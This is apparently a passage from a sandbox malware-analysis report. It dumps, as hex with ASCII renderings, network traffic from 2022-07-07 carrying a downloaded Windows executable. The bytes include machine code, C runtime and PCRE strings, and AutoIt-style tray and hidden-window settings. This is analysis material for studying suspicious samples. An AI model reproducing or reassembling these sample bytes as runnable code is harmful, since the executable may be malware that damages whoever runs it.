00 00 48 89 01 41 8b 86 10 32 0a 00 89 41 08 48 8d 8c 24 2c 02 00 00 e8 18 1d fa ff 33 c0 89 bc 24
                                                                                                                                                            Data Ascii: 1MfA3$H$H$f$I1D$H$HA1fA3$H$H$$f$I1D$H$3HA2fA3H$ H$H$$f$I2$D$HA2AH$,3$
                                                                                                                                                            2022-07-07 07:51:09 UTC486INData Raw: e8 fd 8e f8 ff 48 8d 4c 24 20 e8 f3 8e f8 ff 4c 8d 9c 24 50 03 03 00 33 c0 49 8b 5b 30 49 8b 6b 38 49 8b 73 40 49 8b e3 41 5f 41 5e 41 5d 41 5c 5f c3 48 83 ec 38 44 8b 4a 10 c6 44 24 20 00 e8 1e fb ff ff 48 83 c4 38 c3 cc cc cc cc cc cc cc cc cc 48 83 ec 38 44 8b 4a 10 c6 44 24 20 01 e8 fe fa ff ff 48 83 c4 38 c3 cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 6c 24 18 56 57 41 54 48 81 ec 60 02 00 00 33 db 48 83 7a 10 02 49 8b f8 48 8b ea 48 8b f1 72 0f 48 8b 42 08 48 8b 48 08 e8 cc 70 f9 ff 8b d8 f6 c3 08 0f 84 b3 00 00 00 f6 c3 01 75 09 f6 c3 02 0f 84 a5 00 00 00 48 8b 45 08 48 8b 08 e8 b7 89 fe ff 48 83 64 24 20 00 4c 8d 44 24 50 48 8d 94 24 88 02 00 00 48 8b c8 45 33 c9 e8 45 ea f9 ff 48 8d 94 24 88 02 00 00 48 8d 4c 24 30 e8 27 85 f8 ff 48 8d 54 24
                                                                                                                                                            Data Ascii: HL$ L$P3I[0Ik8Is@IA_A^A]A\_H8DJD$ H8H8DJD$ H8H\$Hl$VWATH`3HzIHHrHBHHpuHEHHd$ LD$PH$HE3EH$HL$0'HT$
                                                                                                                                                            2022-07-07 07:51:09 UTC502INData Raw: 8b cd e8 9b c9 ff ff 8b d6 48 8b c8 e8 e1 23 fc ff 48 8d 4c 24 20 4c 8b ce 48 8b d0 45 33 c0 48 8b d8 e8 cb 51 f8 ff 48 8b cb e8 23 93 f9 ff 48 8d 54 24 20 48 8b cd e8 d6 59 f9 ff 48 8d 4c 24 20 e8 bc 4e f8 ff 48 8b 07 45 33 c0 8b d6 48 63 48 04 48 03 cf e8 d8 24 f9 ff eb 2b e8 81 20 fc ff 48 83 a7 f0 07 00 00 00 ba 01 00 00 00 eb 05 ba 02 00 00 00 48 8b 07 45 33 c0 48 63 48 04 48 03 cf e8 0b 25 f9 ff 48 8b 5c 24 50 48 8b 6c 24 58 48 8b 74 24 60 33 c0 48 83 c4 40 5f c3 cc cc cc cc 48 89 5c 24 18 48 89 6c 24 20 56 57 41 54 41 55 41 56 48 83 ec 50 48 8b da 48 8b f1 48 8d 15 ed de 01 00 49 8b c8 0f 29 74 24 40 4d 8b f1 4d 8b e0 e8 9a 55 f9 ff 48 8b 43 08 48 8b 08 e8 7e 71 f8 ff 48 83 7b 10 01 66 0f 28 f0 76 12 48 8b 4b 08 48 8b 49 08 e8 a6 20 fd ff 40 8a e8
                                                                                                                                                            Data Ascii: H#HL$ LHE3HQH#HT$ HYHL$ NHE3HcHH$+ HHE3HcHH%H\$PHl$XHt$`3H@_H\$Hl$ VWATAUAVHPHHHI)t$@MMUHCH~qH{f(vHKHI @
                                                                                                                                                            2022-07-07 07:51:09 UTC518INData Raw: 43 08 48 8b 08 e8 48 02 f9 ff 4c 8b 4b 08 49 8b 49 08 4c 8b e0 e8 38 02 f9 ff 48 8b 4b 08 48 8b 49 10 48 8b e8 e8 28 02 f9 ff 33 f6 48 83 7b 10 04 4c 8b f0 72 0f 48 8b 4b 08 48 8b 49 18 e8 2f f1 f8 ff 8b f0 48 8d 94 24 f8 00 00 00 48 8d 4c 24 40 4c 8b c5 e8 a8 9a ff ff 48 8b 9c 24 f8 00 00 00 49 8b d4 85 db 74 35 49 8b cd e8 a1 19 f9 ff 4c 8b 1f 45 33 c0 49 63 4b 04 41 8d 50 02 48 03 cf e8 0b e5 f8 ff 48 8b 07 8d 53 01 48 63 48 04 45 33 c0 48 03 cf e8 96 e4 f8 ff eb 5b 48 8d 4c 24 40 e8 2a 08 ff ff 49 8b 54 24 08 48 8d 4c 24 20 e8 bb 00 f9 ff 4c 8d 4c 24 20 48 8d 4c 24 40 44 8b c6 49 8b d6 e8 76 f6 ff ff 48 8d 54 24 20 49 8b cd 8b d8 e8 37 19 f9 ff 4c 8b 1f 49 63 4b 04 45 33 c0 8b d3 48 03 cf e8 43 e4 f8 ff 48 8d 4c 24 20 e8 09 0e f8 ff 48 8d 4c 24 40 e8
                                                                                                                                                            Data Ascii: CHHLKIIL8HKHIH(3H{LrHKHI/H$HL$@LH$It5ILE3IcKAPHHSHcHE3H[HL$@*IT$HL$ LL$ HL$@DIvHT$ I7LIcKE3HCHL$ HL$@
                                                                                                                                                            2022-07-07 07:51:09 UTC534INData Raw: 20 48 8d 59 08 41 8a f0 48 8b fa 48 8b cb e8 df e3 f8 ff 48 8b d7 48 8b c8 e8 c4 23 f8 ff 48 8b cb e8 cc e3 f8 ff 48 8b 5c 24 30 40 88 70 18 48 8b 74 24 38 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 8b 02 48 8b da 48 8b f9 89 01 8b 42 04 48 83 c1 18 89 41 ec 8b 42 08 48 83 c2 18 89 41 f0 48 8b 42 f8 48 89 41 f8 e8 6b 23 f8 ff 48 8d 53 30 48 8d 4f 30 e8 5e 23 f8 ff 48 8b 5c 24 30 48 8b c7 48 83 c4 20 5f c3 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 54 41 55 41 57 48 81 ec 90 00 00 00 48 8b f1 48 8d 48 98 45 33 ff 49 8b e9 4d 8b e0 4c 8b ea 41 8b df e8 75 ce f8 ff 41 ff 04 24 45 8b 0c 24 49 8b 45 08 4c 89 7c 24 20 4a 8b 0c c8 4c 89 7c 24 28 44 88 7c 24 30 66 83 79 08 7f 44 88 7c 24 31 74 47 41 8d 57 72 44 0f bf
                                                                                                                                                            Data Ascii: HYAHHHH#HH\$0@pHt$8H _H\$WH HHBHABHAHBHAk#HS0HO0^#H\$0HH _HHXHhHpHx ATAUAWHHHHE3IMLAuA$E$IEL|$ JL|$(D|$0fyD|$1tGAWrD
                                                                                                                                                            2022-07-07 07:51:09 UTC550INData Raw: 44 8d 42 01 48 89 4c 24 68 48 8b 48 10 48 8b 40 18 ff 00 48 89 44 24 78 48 8b 45 08 48 89 4c 24 70 48 8b 08 48 89 5c 24 60 c7 44 24 20 01 00 00 00 e8 bc 7c f8 ff 48 8b c8 e8 34 71 f8 ff 48 8d 8c 24 80 00 00 00 48 8b d3 89 44 24 48 e8 d0 85 f7 ff 48 8b 4c 24 58 4c 8d 5c 24 41 48 8d 44 24 40 4c 8d 8c 24 e8 00 00 00 4c 89 5c 24 30 48 89 44 24 28 48 8d 84 24 f8 00 00 00 4c 8d 44 24 4c 48 8d 94 24 80 00 00 00 48 89 44 24 20 e8 60 17 ff ff 48 8d 8c 24 80 00 00 00 84 c0 0f 94 c3 e8 5e 8e f7 ff 84 db 0f 85 97 00 00 00 c6 07 01 38 9c 24 e8 00 00 00 74 03 c6 07 05 80 bc 24 f8 00 00 00 00 74 03 80 0f 08 80 7c 24 40 00 74 03 80 0f 10 0f b7 44 24 4c 48 8d 4c 24 60 66 89 47 02 8b 44 24 48 66 89 47 04 e8 15 8e f7 ff 8b 44 24 44 ff c0 49 ff c6 48 83 c7 06 4d 3b f7 89 44
                                                                                                                                                            Data Ascii: DBHL$hHHH@HD$xHEHL$pHH\$`D$ |H4qH$HD$HHL$XL\$AHD$@L$L\$0HD$(H$LD$LH$HD$ `H$^8$t$t|$@tD$LHL$`fGD$HfGD$DIHM;D
                                                                                                                                                            2022-07-07 07:51:09 UTC566INData Raw: ff eb 30 48 8d 15 28 60 01 00 48 8d 4c 24 38 e8 7e 4f fc ff 84 c0 74 20 48 8b 43 08 48 8b 48 20 e8 2d 42 f8 ff 45 33 c0 48 8b d0 48 8b cd e8 cf e4 fe ff 44 8a e8 eb 0e 48 8b cf e8 f2 a2 f7 ff 83 27 00 89 77 08 45 84 ed 75 15 49 8b 04 24 45 33 c0 8b d6 48 63 48 04 49 03 cc e8 32 25 f8 ff 48 8d 4c 24 20 e8 c8 a2 f7 ff 48 8d 4c 24 38 e8 8e 4e f7 ff 48 8d 4c 24 58 e8 84 4e f7 ff 4c 8d 9c 24 80 00 00 00 33 c0 49 8b 5b 20 49 8b 6b 28 49 8b 73 30 49 8b e3 41 5d 41 5c 5f c3 cc cc cc cc cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 54 48 81 ec 80 00 00 00 49 8b f0 48 8b fa 48 8b d9 e8 c6 ec ff ff 84 c0 75 2c 48 8b ce e8 5a a2 f7 ff 83 26 00 bd 01 00 00 00 89 6e 08 48 8b 03 45 33 c0 48 63 48 04 8b d5 48 03 cb e8 9b 24 f8 ff e9 6f 03 00 00 48 8d 4c
                                                                                                                                                            Data Ascii: 0H(`HL$8~Ot HCHH -BE3HHDH'wEuI$E3HcHI2%HL$ HL$8NHL$XNL$3I[ Ik(Is0IA]A\_HHXHhHpHx ATHIHHu,HZ&nHE3HcHH$oHL
                                                                                                                                                            2022-07-07 07:51:09 UTC582INData Raw: ff 48 8b 0f 45 33 c9 ba 0a 11 00 00 45 8d 41 09 ff 15 a4 65 00 00 33 db 48 3b c3 0f 84 6b 07 00 00 48 8b 0f 4c 8d 4c 24 70 45 33 c0 ba 3e 11 00 00 48 89 44 24 78 c7 44 24 70 04 00 00 00 ff 15 76 65 00 00 3b c3 0f 84 40 07 00 00 48 8b 87 88 00 00 00 48 39 47 50 0f 84 2f 07 00 00 81 7f 18 00 10 00 00 0f 84 22 07 00 00 8d 73 01 39 77 18 e9 f3 fd ff ff 3d c0 fe ff ff 0f 84 fd 06 00 00 3d d4 fe ff ff 0f 84 f2 06 00 00 83 f8 93 0f 84 1e 06 00 00 83 f8 94 0f 84 5b 05 00 00 83 f8 f0 0f 84 47 05 00 00 83 f8 f4 0f 84 0d 04 00 00 83 f8 fb 0f 84 76 01 00 00 83 f8 fe 0f 85 cb 06 00 00 41 b8 01 00 00 00 49 8b d4 49 8b cd e8 a0 45 fd ff 48 8d 4c 24 30 ff 15 45 63 00 00 48 8b 0f 48 8d 54 24 30 ff 15 97 64 00 00 48 8b 17 49 8b cd e8 4c c9 fb ff 83 f8 ff 0f 84 8d 06 00 00
                                                                                                                                                            Data Ascii: HE3EAe3H;kHLL$pE3>HD$xD$pve;@HH9GP/"s9w==[GvAIIEHL$0EcHHT$0dHIL
                                                                                                                                                            2022-07-07 07:51:09 UTC598INData Raw: 00 00 00 eb 08 41 ff ce eb 03 41 ff c6 ff c6 48 83 c1 08 8b c6 48 89 8c 24 88 00 00 00 48 3b 45 10 72 80 83 4c 24 20 ff 4c 8d 4c 24 30 4c 8b c7 48 8b d5 48 8b cb e8 b7 ff f6 ff 85 c0 0f 85 94 00 00 00 48 8d 54 24 30 49 8b cd e8 92 23 f7 ff 45 33 ff 8b 17 48 8b 45 08 be 7f 00 00 00 48 8b 0c d0 66 39 71 08 0f 84 9e 00 00 00 66 83 79 08 40 75 73 8d 42 01 89 07 48 8b 55 08 48 8b 0c c2 66 83 79 08 33 75 6a 44 8b a4 24 98 02 00 00 e9 9c f9 ff ff ba 79 00 00 00 eb 58 44 8b c6 ba 7d 00 00 00 eb 5d 44 8b c6 ba 7e 00 00 00 eb 53 44 8b c6 ba 7b 00 00 00 eb 49 45 0f bf 46 0a ba b1 00 00 00 eb 3d 45 8b c7 ba 7c 00 00 00 eb 33 45 0f bf 44 24 0a eb e7 45 8b c7 ba 6e 00 00 00 eb 21 45 8b c7 eb c2 8b d6 eb 0d ba 9b 00 00 00 eb 02 8b d6 48 8b 45 08 8b 0f 48 8b 0c c8 44 0f
                                                                                                                                                            Data Ascii: AAHH$H;ErL$ LL$0LHHHT$0I#E3HEHf9qfy@usBHUHfy3ujD$yXD}]D~SD{IEF=E|3ED$En!EHEHD
                                                                                                                                                            2022-07-07 07:51:09 UTC614INData Raw: 00 00 52 36 30 31 38 0d 0a 2d 20 75 6e 65 78 70 65 63 74 65 64 20 68 65 61 70 20 65 72 72 6f 72 0d 0a 00 00 00 00 00 00 00 00 52 36 30 31 37 0d 0a 2d 20 75 6e 65 78 70 65 63 74 65 64 20 6d 75 6c 74 69 74 68 72 65 61 64 20 6c 6f 63 6b 20 65 72 72 6f 72 0d 0a 00 00 00 00 52 36 30 31 36 0d 0a 2d 20 6e 6f 74 20 65 6e 6f 75 67 68 20 73 70 61 63 65 20 66 6f 72 20 74 68 72 65 61 64 20 64 61 74 61 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 0a 54 68 69 73 20 61 70 70 6c 69 63 61 74 69 6f 6e 20 68 61 73 20 72 65 71 75 65 73 74 65 64 20 74 68 65 20 52 75 6e 74 69 6d 65 20 74 6f 20 74 65 72 6d 69 6e 61 74 65 20 69 74 20 69 6e 20 61 6e 20 75 6e 75 73 75 61 6c 20 77 61 79 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 61 70 70 6c 69 63 61 74 69 6f
                                                                                                                                                            Data Ascii: R6018- unexpected heap errorR6017- unexpected multithread lock errorR6016- not enough space for thread dataThis application has requested the Runtime to terminate it in an unusual way.Please contact the applicatio
                                                                                                                                                            2022-07-07 07:51:09 UTC630INData Raw: 20 6f 72 20 28 3f 5b 2b 2d 5d 64 69 67 69 74 73 20 6d 75 73 74 20 62 65 20 66 6f 6c 6c 6f 77 65 64 20 62 79 20 29 00 75 6e 6b 6e 6f 77 6e 20 50 4f 53 49 58 20 63 6c 61 73 73 20 6e 61 6d 65 00 50 4f 53 49 58 20 63 6f 6c 6c 61 74 69 6e 67 20 65 6c 65 6d 65 6e 74 73 20 61 72 65 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 00 74 68 69 73 20 76 65 72 73 69 6f 6e 20 6f 66 20 50 43 52 45 20 69 73 20 6e 6f 74 20 63 6f 6d 70 69 6c 65 64 20 77 69 74 68 20 50 43 52 45 5f 55 54 46 38 20 73 75 70 70 6f 72 74 00 73 70 61 72 65 20 65 72 72 6f 72 00 63 68 61 72 61 63 74 65 72 20 76 61 6c 75 65 20 69 6e 20 5c 78 7b 2e 2e 2e 7d 20 73 65 71 75 65 6e 63 65 20 69 73 20 74 6f 6f 20 6c 61 72 67 65 00 69 6e 76 61 6c 69 64 20 63 6f 6e 64 69 74 69 6f 6e 20 28 3f 28 30 29 00 5c 43 20
                                                                                                                                                            Data Ascii: or (?[+-]digits must be followed by )unknown POSIX class namePOSIX collating elements are not supportedthis version of PCRE is not compiled with PCRE_UTF8 supportspare errorcharacter value in \x{...} sequence is too largeinvalid condition (?(0)\C
                                                                                                                                                            2022-07-07 07:51:09 UTC646INData Raw: 54 00 69 00 6d 00 65 00 6f 00 75 00 74 00 00 00 00 00 64 00 31 00 30 00 30 00 6d 00 30 00 00 00 00 00 54 00 72 00 61 00 79 00 41 00 75 00 74 00 6f 00 50 00 61 00 75 00 73 00 65 00 00 00 00 00 00 00 54 00 72 00 61 00 79 00 49 00 63 00 6f 00 6e 00 44 00 65 00 62 00 75 00 67 00 00 00 00 00 00 00 54 00 72 00 61 00 79 00 49 00 63 00 6f 00 6e 00 48 00 69 00 64 00 65 00 00 00 00 00 00 00 00 00 64 00 30 00 23 00 31 00 00 00 00 00 00 00 00 00 54 00 72 00 61 00 79 00 4d 00 65 00 6e 00 75 00 4d 00 6f 00 64 00 65 00 00 00 00 00 00 00 00 00 64 00 30 00 23 00 32 00 00 00 00 00 00 00 00 00 54 00 72 00 61 00 79 00 4f 00 6e 00 45 00 76 00 65 00 6e 00 74 00 4d 00 6f 00 64 00 65 00 00 00 57 00 69 00 6e 00 44 00 65 00 74 00 65 00 63 00 74 00 48 00 69 00 64 00 64 00 65 00 6e
                                                                                                                                                            Data Ascii: Timeoutd100m0TrayAutoPauseTrayIconDebugTrayIconHided0#1TrayMenuModed0#2TrayOnEventModeWinDetectHidden
                                                                                                                                                            2022-07-07 07:51:09 UTC662INData Raw: 0b 00 1c 34 4b 00 1c 01 42 00 15 f0 13 e0 11 d0 0f c0 0d 70 0c 60 0b 50 00 00 01 10 06 00 10 64 09 00 10 34 08 00 10 52 0c 70 01 14 0a 00 14 34 12 00 14 92 10 f0 0e e0 0c d0 0a c0 08 70 07 60 06 50 01 20 0c 00 20 64 0f 00 20 54 0e 00 20 34 0d 00 20 52 1c f0 1a e0 18 d0 16 c0 14 70 01 17 08 00 17 54 0c 00 17 34 0b 00 17 52 13 c0 11 70 10 60 01 17 08 00 17 54 0e 00 17 34 0d 00 17 72 13 c0 11 70 10 60 01 1a 09 00 1a 54 18 00 1a 34 17 00 1a 01 12 00 13 e0 11 70 10 60 00 00 01 0f 06 00 0f 64 09 00 0f 54 08 00 0f 52 0b 70 01 25 0d 00 25 64 16 04 25 54 15 04 25 34 14 04 25 01 0e 04 18 f0 16 e0 14 d0 12 c0 10 70 00 00 01 12 07 00 12 64 19 00 12 34 18 00 12 01 16 00 0b 70 00 00 01 17 08 00 17 64 14 00 17 54 13 00 17 34 12 00 17 f2 10 70 01 1f 0d 00 1f 64 28 00 1f
                                                                                                                                                            Data Ascii: 4KBp`Pd4Rp4p`P d T 4 RpT4Rp`T4rp`T4p`dTRp%%d%T%4%pd4pdT4pd(
                                                                                                                                                            2022-07-07 07:51:09 UTC678INData Raw: 00 00 7e a5 0a 00 00 00 00 00 94 a5 0a 00 00 00 00 00 4e a5 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 25 00 00 00 00 00 00 80 29 00 00 00 00 00 00 80 02 00 00 00 00 00 00 80 a2 01 00 00 00 00 00 80 4d 00 00 00 00 00 00 80 27 00 00 00 00 00 00 80 17 00 00 00 00 00 00 80 08 00 00 00 00 00 00 80 0a 00 00 00 00 00 00 80 09 00 00 00 00 00 00 80 b9 00 00 00 00 00 00 80 26 00 00 00 00 00 00 80 a2 00 00 00 00 00 00 80 23 00 00 00 00 00 00 80 18 00 00 00 00 00 00 80 dc 00 00 00 00 00 00 80 00 00 00 00 00 00 00 00 dc a6 0a 00 00 00 00 00 02 a7 0a 00 00 00 00 00 18 a7 0a 00 00 00 00 00 ec a6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2a c1 0a 00 00 00 00 00 18 c1 0a 00 00 00 00 00 04 c1 0a 00 00 00 00 00 f2 c0 0a 00 00 00 00 00 dc c0 0a 00 00 00 00 00 c6 c0 0a 00 00
                                                                                                                                                            Data Ascii: ~N%)M'&#*
                                                                                                                                                            2022-07-07 07:51:09 UTC694INData Raw: 00 00 c0 01 00 00 00 00 00 00 6d 03 00 00 00 00 00 00 29 02 00 00 00 00 00 00 66 01 00 00 00 00 00 00 3c 01 00 00 00 00 00 00 0e 01 00 00 00 00 00 00 04 01 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 51 02 00 00 00 00 00 00 8e 01 00 00 00 00 00 00 bd 02 00 00 00 00 00 00 ae 03 00 00 00 00 00 00 c5 03 00 00 00 00 00 00 86 01 00 00 00 00 00 00 72 03 00 00 00 00 00 00 1b 01 00 00 00 00 00 00 3a 02 00 00 00 00 00 00 09 01 00 00 00 00 00 00 dd 00 00 00 00 00 00 00 b8 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 24 01 00 00 00 00 00 00 ee 02 00 00 00 00 00 00 82 02 00 00 00 00 00 00 d1 01 00 00 00 00 00 00 48 02 00 00 00 00 00 00 cf 01 00 00 00 00 00 00 87 03 00 00 00 00 00 00 eb 01 00 00 00 00 00 00 72 00 00 00 00 00 00 00 12 03 00 00 00 00 00 00 69 02 00 00 00
                                                                                                                                                            Data Ascii: m)f<Qr:$Hri
                                                                                                                                                            2022-07-07 07:51:09 UTC710INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                            Data Ascii:
                                                                                                                                                            2022-07-07 07:51:09 UTC726INData Raw: 0a 00 7c fd 01 00 ac fd 01 00 ec 3f 0a 00 ac fd 01 00 66 fe 01 00 94 45 0a 00 68 fe 01 00 f8 fe 01 00 9c 45 0a 00 f8 fe 01 00 85 00 02 00 a4 45 0a 00 88 00 02 00 bf 00 02 00 f8 3e 0a 00 c0 00 02 00 11 01 02 00 4c 47 0a 00 14 01 02 00 97 01 02 00 c4 6d 0a 00 98 01 02 00 a5 0c 02 00 b8 45 0a 00 a8 0c 02 00 f4 0c 02 00 dc 45 0a 00 f4 0c 02 00 fd 0d 02 00 e4 45 0a 00 00 0e 02 00 ea 0e 02 00 38 85 0a 00 ec 0e 02 00 50 10 02 00 38 85 0a 00 50 10 02 00 21 11 02 00 f4 45 0a 00 24 11 02 00 59 11 02 00 c4 63 0a 00 5c 11 02 00 2a 12 02 00 04 46 0a 00 c0 12 02 00 60 1c 02 00 1c 46 0a 00 60 1c 02 00 4d 1f 02 00 40 46 0a 00 50 1f 02 00 ff 1f 02 00 c4 6d 0a 00 00 20 02 00 ac 20 02 00 78 46 0a 00 ac 20 02 00 30 21 02 00 ec 3f 0a 00 30 21 02 00 d6 21 02 00 88 46 0a 00 00
                                                                                                                                                            Data Ascii: |?fEhEE>LGmEEE8P8P!E$Yc\*F`F`M@FPm xF 0!?0!!F
                                                                                                                                                            2022-07-07 07:51:09 UTC742INData Raw: 07 00 57 97 07 00 ec 3f 0a 00 60 97 07 00 77 97 07 00 ec 3f 0a 00 80 97 07 00 94 99 07 00 e0 74 0a 00 a0 99 07 00 d6 99 07 00 7c 50 0a 00 e0 99 07 00 c1 9b 07 00 bc 75 0a 00 d0 9b 07 00 e5 9b 07 00 8c 5a 0a 00 f0 9b 07 00 13 a0 07 00 e4 75 0a 00 20 a0 07 00 b0 a0 07 00 7c 50 0a 00 b0 a0 07 00 d9 a0 07 00 f8 3e 0a 00 e0 a0 07 00 61 a1 07 00 cc 7d 0a 00 70 a1 07 00 f5 a1 07 00 c4 6d 0a 00 00 a2 07 00 32 a2 07 00 8c 5a 0a 00 40 a2 07 00 6d a2 07 00 8c 5a 0a 00 70 a2 07 00 59 a5 07 00 f8 75 0a 00 60 a5 07 00 44 a8 07 00 10 76 0a 00 50 a8 07 00 6e a8 07 00 ec 3f 0a 00 70 a8 07 00 77 a9 07 00 90 77 0a 00 80 a9 07 00 d3 a9 07 00 94 5c 0a 00 e0 a9 07 00 43 aa 07 00 b0 4b 0a 00 50 aa 07 00 d3 aa 07 00 94 5c 0a 00 f0 aa 07 00 9d ab 07 00 7c 50 0a 00 a0 ab 07 00 f4
                                                                                                                                                            Data Ascii: W?`w?t|PuZu |P>a}pm2Z@mZpYu`DvPn?pww\CKP\|P
                                                                                                                                                            2022-07-07 07:51:09 UTC758INData Raw: 67 94 3f fd bc 3f 4b e1 2f 5d d3 84 07 f6 46 b5 3c 03 e2 3e 55 fd af db 30 0f 2d 0d 2e 45 fd ab 98 fa 3b 99 fa db ad 6a b3 9f aa fe 7a 4d f5 a7 67 f5 2b e3 18 b2 7b fd c5 0b d4 3f 98 51 ff df 66 ab bf 56 ad 28 e8 86 35 3e e4 f9 eb 7d e7 b5 35 e8 74 01 22 80 19 80 1f 3e b0 ff be 3f bd ee f9 8c 92 de e7 55 fe cf 39 a1 1a 87 46 cc e8 cb 6e f7 97 47 d5 9f 8f db 5e 1f eb 60 ea bf 10 f3 6a 1d 8a fa 57 55 71 f5 e7 bd fe d4 07 7e cc 59 8f fb 1e 6f af 3f 7a 00 67 ea 33 8d 51 f5 97 10 cf 6a f7 0f f3 27 fe 32 ea ef 53 9e f8 d3 52 7f 39 cb fb 47 98 fa 7f f8 82 05 77 df f6 ee 25 5f 9e 49 31 30 27 09 a0 6b 24 b2 f4 bb f7 77 fc ea cd fe f8 d9 0a bb 4b ec 4a 09 ba d1 3e ff 36 13 2e 3e b1 41 55 ff a2 de 7f 2b de bd a1 91 79 7f a6 fe 35 7c 8a 2f 2b 9c 36 8b aa fe 66 23 2c
                                                                                                                                                            Data Ascii: g??K/]F<>U0-.E;jzMg+{?QfV(5>}5t">?U9FnG^`jWUq~Yo?zg3Qj'2SR9Gw%_I10'k$wKJ>6.>AU+y5|/+6f#,
                                                                                                                                                            2022-07-07 07:51:09 UTC774INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 61 34 bd c1 7a 43 ff ed 9c 49 ff d1 83 34 ff b1 a0 92 ff e1 e0 e0 ff f1 f1 f1 ff f3 f4 f4 ff f3 f3 f3 ff f4 f4 f4 ff f4 f4 f4 ff f5 f5 f5 ff f5 f5 f5 ff f5 f5 f5 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f7 f7 f7 ff f7 f7 f7 ff f8 f8 f8 ff f8 f8 f8 ff f9 f9 f9 ff f9 f9 f9 ff f9 f9 f9 ff fa fa fa ff fa fa fa ff fa fa fa ff fb fb fb ff fb fb fb ff fc fc fc ff fc fc fc ff fd fd fd ff fd fd fd ff fe fe fe ff fb fa fa ff db e3 e9 ff c9 a2 83 ff f1 85 30 ff dc 81 3a f4 bc 84 5e 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                            Data Ascii: a4zCI40:^
                                                                                                                                                            2022-07-07 07:51:09 UTC790INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                            Data Ascii:
                                                                                                                                                            2022-07-07 07:51:09 UTC806INData Raw: 9f cb 69 92 66 da 4c 4d 0e 92 fb 33 83 d2 bb 85 a9 ba 1e d2 48 3b f1 4f e7 29 3c b9 a0 e3 73 3c 3c c0 ae 8e 6f dd 23 c8 9a ce 93 59 87 c7 cd 6d 1c 69 e9 d6 b7 3c 21 75 18 77 62 68 7c 81 78 fb 53 9b e7 a9 4a ad e6 79 59 3f 2e b1 0a 1e 7f 1b b8 19 e4 d8 70 c1 16 1b 95 07 09 9e 59 ae a3 cd 1d 43 94 2d ff d7 45 5f 1f 7a cb dd 42 7f 18 49 b7 d2 da d9 ad 1a 84 a8 d9 29 c0 14 0c d9 76 5e 58 63 5e a5 90 f4 3e 11 26 48 71 5f a9 3a f5 04 66 de 18 cb c8 63 e1 5d 5b 21 23 1b a6 a3 f1 85 b6 14 ad 99 51 8c 25 36 37 f5 ee cf 5d 7f e2 4b 41 00 bb 51 f6 19 57 52 0d 33 41 d1 05 34 49 e3 ea a4 d2 6c d2 15 c2 85 2e 9c c4 cf a1 87 35 c7 24 07 47 76 f9 52 67 62 25 e2 65 54 71 66 33 86 c1 95 27 52 71 a5 73 52 e1 44 b4 58 d7 9f c7 e7 0f 82 4d df 31 89 e7 08 b5 e8 dd cb 3e d6 b4
                                                                                                                                                            Data Ascii: ifLM3H;O)<s<<o#Ymi<!uwbh|xSJyY?.pYC-E_zBI)v^Xc^>&Hq_:fc][!#Q%67]KAQWR3A4Il.5$GvRgb%eTqf3'RqsRDXM1>
